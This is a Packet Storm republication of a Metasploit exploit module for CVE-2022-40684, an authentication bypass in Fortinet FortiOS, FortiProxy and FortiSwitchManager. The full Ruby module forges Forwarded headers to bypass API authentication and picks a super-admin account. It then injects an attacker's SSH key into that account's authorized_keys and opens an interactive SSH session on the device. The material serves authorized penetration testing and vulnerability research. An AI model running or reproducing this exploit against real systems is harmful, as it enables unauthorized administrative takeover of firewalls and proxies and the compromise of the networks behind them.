Lucene search

K
packetstormHeyder Andrade, Zach Hanley, metasploit.comPACKETSTORM:169431
HistoryOct 19, 2022 - 12:00 a.m.

Fortinet FortiOS / FortiProxy / FortiSwitchManager Authentication Bypass

2022-10-1900:00:00
Heyder Andrade, Zach Hanley, metasploit.com
packetstormsecurity.com
301
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::SSH  
prepend Msf::Exploit::Remote::AutoCheck  
  
attr_accessor :ssh_socket  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',  
'Description' => %q{  
This module exploits an authentication bypass vulnerability  
in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API  
to gain access to a chosen account. And then add a SSH key to the  
authorized_keys file of the chosen account, allowing  
to login to the system with the chosen account.  
  
Successful exploitation results in remote code execution.  
},  
'Author' => [  
'Heyder Andrade <@HeyderAndrade>', # Metasploit module  
'Zach Hanley <@hacks_zach>', # PoC  
],  
'References' => [  
['CVE', '2022-40684'],  
['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],  
['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2022-10-10', # Vendor advisory  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD],  
'Privileged' => true,  
'Targets' => [  
[  
'FortiOS',  
{  
'DefaultOptions' => {  
'PAYLOAD' => 'generic/ssh/interact'  
},  
'Payload' => {  
'Compat' => {  
'PayloadType' => 'ssh_interact'  
}  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [  
IOC_IN_LOGS,  
ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file  
]  
}  
)  
)  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),  
OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),  
OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),  
OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),  
OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),  
OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])  
]  
)  
end  
  
def username  
if datastore['USERNAME']  
@username ||= datastore['USERNAME']  
else  
@username ||= detect_username  
end  
end  
  
def ssh_rport  
datastore['SSH_RPORT']  
end  
  
def current_keys  
@current_keys ||= read_keys  
end  
  
def ssh_keygen  
# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`  
if datastore['PRIVATE_KEY']  
@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(  
File.read(datastore['PRIVATE_KEY']),  
datastore['KEY_PASS'],  
datastore['PRIVATE_KEY']  
)  
else  
@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')  
end  
end  
  
def ssh_private_key  
ssh_keygen.to_pem  
end  
  
def ssh_pubkey  
Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)  
end  
  
def authorized_keys  
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)  
"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"  
end  
  
def fortinet_request(params = {})  
send_request_cgi(  
{  
'ctype' => 'application/json',  
'agent' => 'Report Runner',  
'headers' => {  
'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""  
}  
}.merge(params)  
)  
end  
  
def check  
vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")  
# a normal request to the API should return a 401  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),  
'ctype' => 'application/json'  
})  
  
return CheckCode::Unknown('Target did not respond to check.') unless res  
return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401  
  
# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable  
res = fortinet_request({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/system/status')  
})  
  
return CheckCode::Safe unless res&.code == 200  
  
version = res.get_json_document['version']  
  
print_good("Target is running the version #{version}, which is vulnerable.")  
  
Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }  
  
CheckCode::Vulnerable('And SSH is running which makes it exploitable.')  
end  
  
def cleanup  
return unless ssh_socket  
  
# it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method  
data = {  
"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'  
}  
  
fortinet_request({  
'method' => 'PUT',  
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),  
'data' => data.to_json  
})  
end  
  
def detect_username  
vprint_status('User auto-detection...')  
res = fortinet_request(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/system/admin')  
)  
users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact  
# we prefer to use admin, but if it doesn't exist we chose a random one.  
if datastore['PREFER_ADMIN']  
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")  
users.include?('admin') ? 'admin' : users.sample  
else  
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")  
(users - ['admin']).sample  
end  
end  
  
def add_ssh_key  
if current_keys.include?(authorized_keys)  
# then we'll remove that on cleanup  
print_good('Your key is already in the authorized_keys file')  
return  
end  
vprint_status('Adding SSH key to authorized_keys file')  
# Adding the SSH key as the last entry in the authorized_keys file  
keystoadd = current_keys.first(2) + [authorized_keys]  
data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h  
  
res = fortinet_request({  
'method' => 'PUT',  
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),  
'data' => data.to_json  
})  
fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500  
body = res.get_json_document  
fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/  
end  
  
def read_keys  
vprint_status('Reading SSH key from authorized_keys file')  
res = fortinet_request({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/system/admin/', username)  
})  
fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200  
result = res.get_json_document['results'].first  
['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|  
result[key].gsub('"', '') unless result[key].empty?  
end.compact  
end  
  
def do_login(ssh_options)  
# ensure we don't have a stale socket hanging around  
ssh_options[:proxy].proxies = nil if ssh_options[:proxy]  
begin  
::Timeout.timeout(datastore['SSH_TIMEOUT']) do  
self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)  
end  
rescue Rex::ConnectionError  
fail_with(Failure::Unreachable, 'Disconnected during negotiation')  
rescue Net::SSH::Disconnect, ::EOFError  
fail_with(Failure::Disconnected, 'Timed out during negotiation')  
rescue Net::SSH::AuthenticationFailed  
fail_with(Failure::NoAccess, 'Failed authentication')  
rescue Net::SSH::Exception => e  
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")  
end  
  
fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket  
end  
  
def exploit  
print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")  
add_ssh_key  
vprint_status('Establishing SSH connection')  
ssh_options = ssh_client_defaults.merge({  
auth_methods: ['publickey'],  
key_data: [ ssh_private_key ],  
port: ssh_rport  
})  
ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']  
  
do_login(ssh_options)  
  
handler(ssh_socket)  
end  
end  
`